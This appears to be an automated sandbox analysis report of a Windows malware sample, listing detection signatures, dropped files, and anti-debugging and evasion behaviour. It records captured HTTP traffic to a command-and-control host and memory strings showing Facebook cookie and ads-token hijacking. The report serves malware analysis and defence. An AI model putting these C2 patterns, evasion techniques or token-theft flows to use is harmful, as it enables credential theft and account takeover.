Analysis Report Cyfj6XGbkd.exe

Overview

General Information

Sample Name: Cyfj6XGbkd.exe
Analysis ID: 346134
MD5: 63204eb716c856723a010747d58a6b00
SHA1: 7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256: 6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Parent Process Executions
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Metadefender: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: Cyfj6XGbkd.exe Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Cyfj6XGbkd.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 2_2_1001F720

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Unpacked PE file: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Unpacked PE file: 4.2.56BB1610C0318054.exe.2620000.5.unpack
Uses 32bit PE files
Source: Cyfj6XGbkd.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611971443428.exe, 00000008.00000000.254487311.000000000040F000.00000002.00020000.sdmp, 1611971443428.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001C.00000000.316118028.0000000000F4C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIB2E9.tmp.1.dr

Spreading:

Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a:
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose, 0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose, 2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /info_old/ddd HTTP/1.1
    Host: 84CFBA021A5A6662.xyz
    Accept: */*
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    POST //fine/send HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 82
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/e HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 677
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/g HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 1393
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    GET /info_old/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    GET /info_old/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Host: 84cfba021a5a6662.xyz
Source: global traffic HTTP traffic detected:
    GET /info_old/ddd HTTP/1.1
    Host: 84CFBA021A5A6662.xyz
    Accept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
